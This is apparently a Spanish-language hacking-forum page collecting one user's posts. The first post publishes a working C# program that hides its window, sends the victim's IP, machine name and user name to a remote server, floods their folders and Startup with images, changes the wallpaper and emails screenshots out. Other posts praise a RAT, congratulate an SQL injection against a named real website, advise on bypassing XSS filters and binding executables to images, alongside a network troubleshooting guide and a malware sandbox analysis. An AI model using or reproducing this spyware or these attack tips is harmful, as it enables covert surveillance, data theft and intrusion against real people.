Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - blackdrake

Páginas 1 ... 29 30 31 32 33 ... 97

#601

C# - VB.NET / [C#] Script -- Estafando a los Estafadores

Julio 06, 2016, 07:48:25 AM

Bueno, debido a que he recibido muchos correos y mps pidiendo el script que utilicé, he decidido publicarlo:

El post al que hago referencia es: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Unas imágenes para mostrar su funcionamiento:

Creación de las imágenes en Startup para que se inicien con windows:

Recibiendo datos de los estafadores:

Captura de pantalla de su bonito escritorio:

Sin más, el código (lo que vais a ver ahora no es un ejemplo bueno de programación, el código está bastante "hardcodeado", ya que lo hice deprisa y corriendo pero es funcional).

Código: csharp


 public partial class Form1 : Form
    {
        public Form1()
        {
            InitializeComponent();
        }
       
       [DllImport("user32.dll", CharSet = CharSet.Auto)]
        private static extern Int32 SystemParametersInfo(UInt32 action, UInt32 uParam, String vParam, UInt32 winIni);

       string backgroundImageUrl = "https://cdn.meme.am/instances/500x/64226723.jpg"; //URL del fondo de pantalla
       
        //Cambiamos el fondo de pantalla
        public void SetWallpaper(String path)
        {
            SystemParametersInfo(0x14, 0, path, 0x01 | 0x02);
        }

        //Descargamos la imagen de la pagina web.
        private void SetWallpaperFromWeb(string url, string path)
        {
            WebClient webClient = new WebClient();
            webClient.DownloadFile(new Uri(url), path);
            SetWallpaper(path);
        }

        private void Form1_Load(object sender, EventArgs e)
        {
           //Sacamos datos como IP, ruta de ejecución, nombre de la máquina etc.. y lo enviamos a un servidor propio:

            string ip = new System.Net.WebClient().DownloadString("https://ipinfo.io/ip").Replace("\n", "");

            string ruta = Directory.GetCurrentDirectory();

            string maquina = Environment.MachineName + " ----- " + Environment.UserName + " ----- " + Environment.OSVersion

            string sURL;
            //Recibe php debe recoger los siguientes parametros y almacenarlos ya sea un txt o en una BD

            sURL = "http://www.url.com/recibe.php?ip=" + ip + "&ruta=" + ruta + "&maquina=" + maquina;

            WebRequest wrGETURL;
            wrGETURL = WebRequest.Create(sURL);
            wrGETURL.GetResponse();

            //Definimos los directorios donde queremos guardar un bonito recuerdo (100 imagenes)

            string desktop = Environment.GetFolderPath(Environment.SpecialFolder.Desktop);
            string documentos = Environment.GetFolderPath(Environment.SpecialFolder.CommonDocuments);
            string musica = Environment.GetFolderPath(Environment.SpecialFolder.MyMusic);
            string imagenes = Environment.GetFolderPath(Environment.SpecialFolder.MyPictures);
            string personal = Environment.GetFolderPath(Environment.SpecialFolder.Personal);
            string startup = Environment.GetFolderPath(Environment.SpecialFolder.Startup);


              //100 imagenes o las que queramos :D
              //Se podria guardar una vez y copiarla, pero de esta manera, se puede generar "DDoS" si queremos.
              int i = 0;
              while (i<100)
              {
                  using (WebClient Client = new WebClient())
                  {
                      //Descargamos la imagen y la guardamos.
                      Client.DownloadFile("http://memesvault.com/wp-content/uploads/Dancing-Troll-Meme-06.jpg", desktop + "/troll" + i + ".jpg");
                      Client.DownloadFile("http://memesvault.com/wp-content/uploads/Dancing-Troll-Meme-06.jpg", documentos + "/troll" + i + ".jpg");
                      Client.DownloadFile("http://memesvault.com/wp-content/uploads/Dancing-Troll-Meme-06.jpg", musica + "/troll" + i + ".jpg");
                      Client.DownloadFile("http://memesvault.com/wp-content/uploads/Dancing-Troll-Meme-06.jpg", imagenes + "/troll" + i + ".jpg");
                      Client.DownloadFile("http://memesvault.com/wp-content/uploads/Dancing-Troll-Meme-06.jpg", personal + "/troll" + i + ".jpg");
                      Client.DownloadFile("http://memesvault.com/wp-content/uploads/Dancing-Troll-Meme-06.jpg", startup + "/troll" + i + ".jpg");
                      i++;
                  }
              }

           //Cambiamos nuestro fondo de pantalla y
           //finalizada la descarga de todas las imagenes, hacemos una captura de pantalla(la enviamos por mail), seguro que ha quedado precioso ^^

            Bitmap bmpScreenshot = new Bitmap(Screen.PrimaryScreen.Bounds.Width, Screen.PrimaryScreen.Bounds.Height, PixelFormat.Format32bppArgb);

            Graphics gfxScreenshot = Graphics.FromImage(bmpScreenshot);

            gfxScreenshot.CopyFromScreen(Screen.PrimaryScreen.Bounds.X, Screen.PrimaryScreen.Bounds.Y, 0, 0, Screen.PrimaryScreen.Bounds.Size, CopyPixelOperation.SourceCopy);

            bmpScreenshot.Save("prueba.png", ImageFormat.Png);


            string rutaca = ruta + @"\prueba.png";
           

            string backgroundImageName = rutaca;
            SetWallpaperFromWeb(backgroundImageUrl, backgroundImageName);

           

            bmpScreenshot = new Bitmap(Screen.PrimaryScreen.Bounds.Width, Screen.PrimaryScreen.Bounds.Height, PixelFormat.Format32bppArgb);

            gfxScreenshot = Graphics.FromImage(bmpScreenshot);

            gfxScreenshot.CopyFromScreen(Screen.PrimaryScreen.Bounds.X, Screen.PrimaryScreen.Bounds.Y, 0, 0, Screen.PrimaryScreen.Bounds.Size, CopyPixelOperation.SourceCopy);

            bmpScreenshot.Save("prueba1.png", ImageFormat.Png);
            string rutacah = ruta + @"\prueba1.png";

            //Enviamos por mail la captura de pantalla.
            SendMail(ip,ruta,maquina,rutacah);

            
            Close();
        }

        private void Form1_Shown(object sender, EventArgs e)
        {
            //Ocultamos el Form1
            Visible = false;
            Opacity = 10000000000;
        }
        
        //Funcion para guardar la captura en el correo.
        public static void SendMail(string ip, string ruta, string maquina, string rutacah)
        {
            try
            {
                var mailaddress = "[email protected]";
                var smtpHost = "smtp.live.com";
                var smtpPort = Convert.ToInt32("587");
                var mailpassword = "password";
                string body = "Los estafadores han picado!!" + ip + "<br/>" + ruta + "<br/>" + maquina;
                
                 
                var fromAddress = new MailAddress(mailaddress, "Pwned Estafadores");
                var toAddress = new MailAddress(mailaddress, "Pwned Estafadores");
                const string subject = "Datos del pwned v3";
                
                   
                var smtp = new SmtpClient
                {
                    Host = smtpHost,
                    Port = smtpPort,
                    EnableSsl = true,
                    DeliveryMethod = SmtpDeliveryMethod.Network,
                    UseDefaultCredentials = false,
                    Credentials = new NetworkCredential(fromAddress.Address, mailpassword)
                };
                using (var message = new MailMessage(fromAddress, toAddress)
                {
                    Subject = subject,
                    Body = body,
                })
                {
                    message.Attachments.Add(new System.Net.Mail.Attachment(rutacah));
                    smtp.Send(message);
                    
                }
            }
            catch (Exception ex)
            {
               // MessageBox.Show(string.Format("Error al enviar el correo! \n {0}", ex.Message), "Error!");
                return;
            }
        }
            


    }

Espero que les sea de utilidad y no sean malos ^^

Un saludo.

#602

Análisis y desarrollo de malwares / Re:ScanRAT Multi-Tools Final Version

Julio 06, 2016, 06:56:29 AM

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
¡Espectacular fudmario!
Gran proyecto, mis felicitaciones

Voy a probarlo cuanto antes

Espectacular es poco...

Sin palabras, muchas gracias por la app, me la descargo ya mismo!

Un saludo.

#603

Hacking ShowOff / Re:[SQLi] http://www.procircuit.cl

Julio 05, 2016, 04:54:10 PM

Buen descubrimiento @You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login, tienen muchas BDs, seguro que hay varias con información interesante ^^

Saludos.

#604

Dudas y pedidos generales / Re:Estructuras dinámicas: Listas tipo Pila - Problema de aplicación - C# - Error

Julio 03, 2016, 04:51:42 PM

Las imágenes están caidas, puedes resubirlas?

Un saludo.

#605

Redes y antenas / [UNDERTIP] Qué hacer cuando no funciona tu conexión a Internet

Julio 03, 2016, 04:40:38 PM

Muchas veces nos desesperamos cuando nos ha dejado de funcionar Internet, lo mejor que se puede hacer es: mantener la calma y seguir estos pasos!

Lo primero que debemos de averiguar es si solo nos ocurre a nosotros o a todos, caso importante para tener en cuenta el hardware de nuestro equipo (una vez revisado nuestro software o no).

1. A veces el navegador con el que accedes Internet falla. Abre otro explorador para asegurarte de que esta no es la causa.

2. Asegúrate de que todos los cables están conectados. Luego, apaga el router y vuélvelo a encender (Antes de reiniciar el router, comprueba que las luces correspondientes están encendidas).

¿Sigue sin funcionar? Entonces comencemos a descartar cosas:

3. Para empezar, identificaremos si el problema se limita al navegador o recae en toda la conexión, para ello, comprobaremos si recibimos correos en Outlook u otro tipo de aplicaciones que tengamos, además, podemos utilizar el comando ping.

Si no hay conexión, se nos indicará que el host de destino no es accesible, mientras que en caso contrario nos informará de los milisegundos que tardan nuestros paquetes en llegar al servidor de Google (en este caso).

En caso de que nos aparezca el error mencionado anteriormente (host de destino no es accesible o host is unreachable {en inglés}) , lo más probable es que tengamos un conflicto con la línea ADSL o el router.

A la hora de comprobar el porqué de los fallos de nuestra conexión, comenzaremos por verificar que tenemos correctamente asignada una IP, para ello utilizaremos el siguiente comando: ipconfig /all y fijarse en Red de Área local (pueden salir bastantes más si tenemos Vmware, virtualbox o alguna vpn instalada.) En linux, utilizariamos ifconfig /all

Hay que comprobar vuestra IP local y que vuestra puerta de enlace esté correcta (IP del Router), lo mismo con el servidor DHCP si no es el router el que nos dá la IP.

Si no tienes IP utiliza los siguientes comandos:

Código: dos

ipconfig /release
ipconfig /flushdns
ipconfig /renew

En linux utilizaremos los siguientes:

Código: bash

sudo dhclient -r Equivale al ipconfig /release (Libera la IP Asignada)
y
sudo dhclient Equivale al ipconfig /renew que solicita una nueva IP al DHCP

(sudo dhclient eth0 o la interfaz que queramos)

Además, podemos utilizar lo siguientes comandos para parar y levantar nuestro adaptador de red: (Cambiar eth0 por nuestra interfaz)

Código: bash

sudo ifdown eth0
sudo ifup eth0

Vuelve a utilizar ipconfig /all o ifconfig /all y fijate si ha cambiado la IP e intenta acceder a internet.

Si sigue sin funcionar internet, accederemos a: Panel de control\Redes e Internet\Centro de redes y recursos compartidos y pulsaremos en Diagnosticar Problemas y dejaremos que Windows simule que hace algo para ayudarnos (aunque hay veces que realmente nos dice donde puede estar el problema).

Si Windows no ha detectado el problema y no ha podido solucionarlo, el siguiente paso será acceder a nuestro adaptador de red, situado en el msimo lugar: Panel de control\Redes e Internet\Centro de redes y recursos compartidos

Click derecho en nuestro adaptador (el de red de área local) y pulsamos en Diagnosticar, con lo que Windows reinciará el adaptador, limpiará la caché de conexiones y refrescará la IP del router, si el paso anterior no ha hecho nada, es difícil que en este lo haga, pero windows nunca deja de sorprendernos.

Si todos los pasos anteriores no han funcionado, puede que el problema se encuentre en el router o en la conexión con él.

Volvemos al router y verificamos que todas las luces estén encendidas correctamente, sobre todo, la de ADSL.

Los ISP (Internet Service Provider) cuentan con sus servidores DNS que, en muchos casos, pueden estar sobrecargados o caídos, lo que provoca los problemas, se recomienda cambiar por los de google para comprobar de manera eficaz si el error era debido a esto, para ello volveremos a nuestro adaptador de red, le daremos doble click -- propiedades -- buscaremos "Procolo de Internet versión 4 (TCP/IPV4)" -- Doble Click y cambiaremos los DNS por los de google

En linux los pasos a seguir serían los siguientes:

Abriremos un terminal de Linux con las teclas Ctrl + Alt + T o haciendo clic en Aplicaciones -> Accesorios -> Terminal
Editamos el archivo de configuración de los servidores DNS con el siguiente comando:

Código: bash

sudo nano /etc/resolv.conf

Pondremos en el fichero los DNS de google:

Código: bash

# Configuración de servidores DNS
nameserver 8.8.8.8

Y finalmente reiniciamos la red:

Código: bash

$ sudo /etc/init.d/networking restart

Si hay algún error con el comando anterior, podemos utilizar los siguientes (cambiando eth0 por nuestra interfaz)

Código: bash

$ sudo ifconfig eth0 down
$ sudo ifconfig eth0 up

Para verificar el estado de nuestra tarjeta de red en linux, usaremos el siguiente comando:

Código: bash

sudo ethtool eth0

El parámetro Link detected nos dice el estado:

Link detected: yes

Para saber a que velocidad y que duplex ha negociado observamos:

Speed: 100Mb/s
Duplex: Full

Si seguimos sin encontrar una solución, accederemos a nuestro router en la siguiente dirección 192.168.1.1 (por defecto), (ver la IP que muestra ipconfig /all como puerta de enlace), una vez en el router, lo reiniciaremos de fábrica y volveremos a configurar todo de nuevo, si esto no arregla el problema, llamar a vuestro ISP, pues seguramente, haya alguna incidencia en la red (aplicable solo si nadie tiene acceso a internet en esa red).

Si el resto tiene acceso y nosotros seguimos sin conseguir conectarnos a internet, comienza a verificar si tarjeta de red está dañada.

Para ver los UNDERTIPS visita:

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Fuente:
Propia
Pcactual
Keopx

#606

Dudas y pedidos generales / Re:Evasión XSS [DUDA]

Julio 03, 2016, 01:18:50 PM

Hay mil formas de escapar de un filtro, puedes utilizar cualquier lista de los muchos fuzzers que hay, pero lo más últil es, que aprendas como funciona el filtro y así intentar bypassearlo.

Intenta ejecutar el XSS sin poner = y nos cuentas.

También he de decir que no siempre se puede bypassear, pero con esos datos, no puedo ayudarte más.

#607

Off Topic / Re:Guerra de cosas! ¿Qué elegís?

Julio 03, 2016, 08:44:23 AM

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
1984 de George Orwell o Un mundo Feliz de Aldous Huxley ?

Un mundo feliz

Instagram o Snapchat

#608

Criptografía / Re:[Aporte] Cómo ocultar archivos dentro en una imágen

Julio 02, 2016, 03:39:18 PM

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
hay alguna manera de poner un .exe dentro de una imagen? osea, darle click a la imagen y que se ejecute el .exe?

Muy buen aporte, muchas gracias!

No, pero puedes bindear un .exe con una imagen, de tal manera que al ejecutar el exe, se abra la imagen.

Saludos.

#609

Seguridad web y en servidores / Re:Crear servidor Web y hacerlo público

Julio 02, 2016, 03:38:36 PM

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Tengo un problemilla.. He visto el post y me he animado a probar a ver que tal y he hecho un pequeño index para la web y cuando en el buscador pongo localhost,genial aparece. Pero a la hora de poner el host de no-ip me aparece la pagina de configuración de mi router. Y si que he abierto el puerto 80 con la ip de mi maquina y he reiniciado el router Alguna idea?

Estás intentando acceder desde tu red o desde fuera?

Mejor explicado, que caso es el tuyo?

Red externa --> NO-IP --> Router
Red interna --> NO-IP --> Router

#610

Underc0de / Re:Diseño de adhesivo underc0de

Julio 02, 2016, 01:51:44 PM

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Yo quiero el adesivo para la tapa de mi ordenador portatil!! Me tendria que descargar el archivo y luego en que sitios me lo podrian imprimr?

Deja de quejarte que ya lo tienes! jajaaja

#611

Underc0de / Re:Bases para ser Staff

Julio 02, 2016, 01:51:06 PM

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Hay dinero para los que esten en el staff? jajaja

No, no cobramos, todo es voluntario...

Saludos.

#612

Dudas y pedidos generales / Re:arreglar boot

Julio 02, 2016, 12:24:44 PM

Genial @You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login! Doy el tema por solucionado!

#613

Dudas y pedidos generales / Re:arreglar boot

Julio 02, 2016, 12:04:38 PM

Puedes utilizar EasyBCD, pruebalo y nos comentas.

Un saludo.

#614

Dudas y pedidos generales / Re:¿Podéis analizar este archivo?

Julio 01, 2016, 06:32:57 PM

Perdona la tardanza, pero se me hizo tarde y tuve que marchar, @You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login también lo analizó y sacó las mismas conclusiones que yo:

MD5   13f77ee2b76469a3994dfd08bae8372f
SHA1   bb78d2a759b44ef7d04d0ff7e74cccc7a4ad4634
Copyright 2010 Indigo Rose Corporation (www.indigorose.com)
ORIGINAL FILENAME:   ams_launch.exe
AutoPlay Media Studio is a Trademark of Indigo Rose Corporation
Created with AutoPlay Media Studio

Aunque se modifica el registro, no toca las importantes (Run por ejemplo):

Código: text

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Network
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Comdlg32
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\IMM
HKEY_USERS\S-1-5-21-1547161642-507921405-839522115-1004\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers
HKEY_CURRENT_USER\SOFTWARE\Microsoft\CTF
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\SystemShared
HKEY_USERS\S-1-5-21-1547161642-507921405-839522115-1004
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\DRIVERS32
Drivers\wave
Drivers\wave\wdmaud.drv
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\DeviceClasses
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\DeviceClasses\{3E227E76-690D-11D2-8161-0000F8775BF1}
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\DeviceClasses\{3E227E76-690D-11D2-8161-0000F8775BF1}\##?#Root#SYSTEM#0000#{3e227e76-690d-11d2-8161-0000f8775bf1}
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\DeviceClasses\{3E227E76-690D-11D2-8161-0000F8775BF1}\##?#Root#SYSTEM#0000#{3e227e76-690d-11d2-8161-0000f8775bf1}\#{cd171de3-69e5-11d2-b56d-0000f8754380}&{9B365890-165F-11D0-A195-0020AFD156E4}
Drivers\midi
Drivers\midi\wdmaud.drv
Drivers\aux
Drivers\aux\wdmaud.drv
Drivers\mixer
Drivers\mixer\wdmaud.drv
HKEY_USERS\S-1-5-21-1547161642-507921405-839522115-1004\Software\Microsoft\Multimedia\Sound Mapper
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Wave Mapper\wdmaud.drv
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Software\Microsoft\Multimedia\Sound Mapper
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Software\Microsoft\Windows\CurrentVersion\Multimedia\MIDIMap
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\MediaResources\DirectSound\Application Compatibility\AUTORUN.EXE4BF2C253006DA400
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\DeviceClasses\{A7C7A5B1-5AF3-11D1-9CED-00A024BF0407}
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\DeviceClasses\{A7C7A5B1-5AF3-11D1-9CED-00A024BF0407}\##?#Root#SYSTEM#0000#{a7c7a5b1-5af3-11d1-9ced-00a024bf0407}
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\DeviceClasses\{A7C7A5B1-5AF3-11D1-9CED-00A024BF0407}\##?#Root#SYSTEM#0000#{a7c7a5b1-5af3-11d1-9ced-00a024bf0407}\#{a7c7a5b0-5af3-11d1-9ced-00a024bf0407}&{9B365890-165F-11D0-A195-0020AFD156E4}
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#PCI#VEN_8086&DEV_2415&SUBSYS_00008086&REV_01#3&267a616a&0&28#{6994ad04-93ef-11d0-a3cc-00a0c9223196}
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#PCI#VEN_8086&DEV_2415&SUBSYS_00008086&REV_01#3&267a616a&0&28#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#Topology
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#PCI#VEN_8086&DEV_2415&SUBSYS_00008086&REV_01#3&267a616a&0&28#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#Wave
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#Root#SYSTEM#0000#{6994ad04-93ef-11d0-a3cc-00a0c9223196}
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#Root#SYSTEM#0000#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#{2f412ab5-ed3a-4590-ab24-b0ce2aa77d3c}&{9B365890-165F-11D0-A195-0020AFD156E4}
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#Root#SYSTEM#0000#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#{4245ff73-1db4-11d2-86e4-98ae20524153}&{9B365890-165F-11D0-A195-0020AFD156E4}
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#Root#SYSTEM#0000#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#{6c1b9f60-c0a9-11d0-96d8-00aa0051e51d}&{9B365890-165F-11D0-A195-0020AFD156E4}
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#Root#SYSTEM#0000#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#{8c07dd50-7a8d-11d2-8f8c-00c04fbf8fef}&dmusic
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#Root#SYSTEM#0000#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#{b7eafdc0-a680-11d0-96d8-00aa0051e51d}&{9B365890-165F-11D0-A195-0020AFD156E4}
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#Root#SYSTEM#0000#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#{eec12db6-ad9c-4168-8658-b03daef417fe}&{ABD61E00-9350-47e2-A632-4438B90C6641}
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\MediaResources
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\MediaResources\DirectSound
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\MediaResources\DirectSound\Device Presence
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Hardware Profiles\Current\System\CurrentControlSet\Enum\PCI\VEN_8086&DEV_2415&SUBSYS_00008086&REV_01\3&267A616A&0&28
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Hardware Profiles\Current\System\CurrentControlSet\Enum\PCI\VEN_8086&DEV_2415&SUBSYS_00008086&REV_01\3&267A616A&0&28\DirectSound
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Hardware Profiles\Current\System\CurrentControlSet\Enum\PCI\VEN_8086&DEV_2415&SUBSYS_00008086&REV_01\3&267A616A&0&28\DirectSound\Device Presence
DirectSound
DirectSound\Device Presence
HKEY_LOCAL_MACHINE\Software\Microsoft\DirectSound
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\MediaResources\DirectSound\Mixer Defaults
DirectSound\Mixer Defaults
DirectSound\Speaker Configuration
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Objects\{20D04FE0-3AEA-1069-A2D8-08002B30309D}
HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{475c7950-e3d2-11e0-8d7a-806d6172696f}\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{475c7952-e3d2-11e0-8d7a-806d6172696f}\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{475c7952-e3d2-11e0-8d7a-806d6172696f}\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{475c7950-e3d2-11e0-8d7a-806d6172696f}\
HKEY_CLASSES_ROOT\Directory
HKEY_CLASSES_ROOT\Directory\CurVer
HKEY_CLASSES_ROOT\Directory\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
HKEY_CLASSES_ROOT\Directory\\ShellEx\IconHandler
HKEY_CLASSES_ROOT\Directory\\Clsid
HKEY_CLASSES_ROOT\Folder
HKEY_CLASSES_ROOT\Folder\Clsid
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\FontSubstitutes

El fichero tiene los siguientes archivos:

Código: text

C:\DOCUME~1\User\LOCALS~1\Temp\AppNana CodeBoot Generador v1.0.exe.2.Manifest
C:\DOCUME~1\User\LOCALS~1\Temp\AppNana CodeBoot Generador v1.0.exe.3.Manifest
C:\DOCUME~1\User\LOCALS~1\Temp\AppNana CodeBoot Generador v1.0.exe.Manifest
C:\DOCUME~1\User\LOCALS~1\Temp\AppNana CodeBoot Generador v1.0.exe.Config
C:\
C:\DOCUME~1\User\LOCALS~1\Temp\AppNana CodeBoot Generador v1.0.exe
C:\WINDOWS\system32\msctfime.ime
C:\DOCUME~1\User\LOCALS~1\Temp\ir_ext_temp_0\AutoPlay\Audio\Click1.ogg
C:\DOCUME~1\User\LOCALS~1\Temp\ir_ext_temp_0\AutoPlay\Audio
C:\DOCUME~1\User\LOCALS~1\Temp
C:\DOCUME~1\User\LOCALS~1\Temp\ir_ext_temp_0\AutoPlay\Audio\High1.ogg
C:\DOCUME~1\User\LOCALS~1\Temp\ir_ext_temp_0\AutoPlay
C:\DOCUME~1\User\LOCALS~1\Temp\ir_ext_temp_0\AutoPlay\autorun.cdd
C:\DOCUME~1\User\LOCALS~1\Temp\ir_ext_temp_0\AutoPlay\Buttons\Acik Mavi.Btn
C:\DOCUME~1\User\LOCALS~1\Temp\ir_ext_temp_0\AutoPlay\Buttons
C:\DOCUME~1\User\LOCALS~1\Temp\ir_ext_temp_0\AutoPlay\Buttons\Boton Youtube.btn
C:\DOCUME~1\User\LOCALS~1\Temp\ir_ext_temp_0\AutoPlay\Buttons\Cik8.Btn
C:\DOCUME~1\User\LOCALS~1\Temp\ir_ext_temp_0\AutoPlay\Buttons\Turuncu.Btn
C:\DOCUME~1\User\LOCALS~1\Temp\ir_ext_temp_0\AutoPlay\Images\AppNana.jpg
C:\DOCUME~1\User\LOCALS~1\Temp\ir_ext_temp_0
C:\DOCUME~1\User\LOCALS~1\Temp\ir_ext_temp_0\autorun.exe
C:\DOCUME~1\User\LOCALS~1\Temp\ir_ext_temp_0\lua5.1.dll
C:\DOCUME~1\User\LOCALS~1\Temp\ir_ext_temp_0\lua51.dll
C:\DOCUME~1\User\LOCALS~1\Temp\ir_ext_temp_0\autorun.exe.2.Manifest
C:\DOCUME~1\User\LOCALS~1\Temp\ir_ext_temp_0\autorun.exe.3.Manifest
C:\DOCUME~1\User\LOCALS~1\Temp\ir_ext_temp_0\autorun.exe.Manifest
C:\DOCUME~1\User\LOCALS~1\Temp\ir_ext_temp_0\autorun.exe.Config
C:\DOCUME~1\User\LOCALS~1\Temp\ir_ext_temp_0\wdmaud.drv
C:\WINDOWS\system32\wdmaud.drv
root#system#0000#{3e227e76-690d-11d2-8161-0000f8775bf1}\{cd171de3-69e5-11d2-b56d-0000f8754380}&{9b365890-165f-11d0-a195-0020afd156e4}
C:\WINDOWS\system32\d3d9.dll
root#system#0000#{a7c7a5b1-5af3-11d1-9ced-00a024bf0407}\{a7c7a5b0-5af3-11d1-9ced-00a024bf0407}&{9b365890-165f-11d0-a195-0020afd156e4}
C:\WINDOWS\System32\Drivers\ac97intc.sys
C:\{146F1A80-4791-11D0-A5D6-28DB04C10000}\\xe6\x9a\xa0\xe1\xea\x87\xe6\x8b\x8e\xe1\xc7\x8f\xed\xda\xa5\xed\xec\xa8\xec\x84\x84
IDE#CdRomVBOX_CD-ROM_____________________________1.0_____#42562d3231303037333036372020202020202020#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
MountPointManager
STORAGE#Volume#1&30a96598&0&Signature32B832B7Offset7E00Length27F4DB200#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
C:\Documents and Settings
C:\Documents and Settings\All Users
C:\Documents and Settings\All Users\Desktop
C:\DOCUME~1\
C:\DOCUME~1\User\
C:\DOCUME~1\User\LOCALS~1\
C:\DOCUME~1\User\LOCALS~1\Temp\
C:\DOCUME~1\User\LOCALS~1\Temp\_ir_tmpfnt_1\
C:\DOCUME~1\User\LOCALS~1\Temp\_ir_tmpfnt_1\Arial_1.TF

Y ningún AV lo detecta salvo:

TheHacker Trojan/FakeAV.wwx
ClamAV Win.Trojan.Fakeav-98257

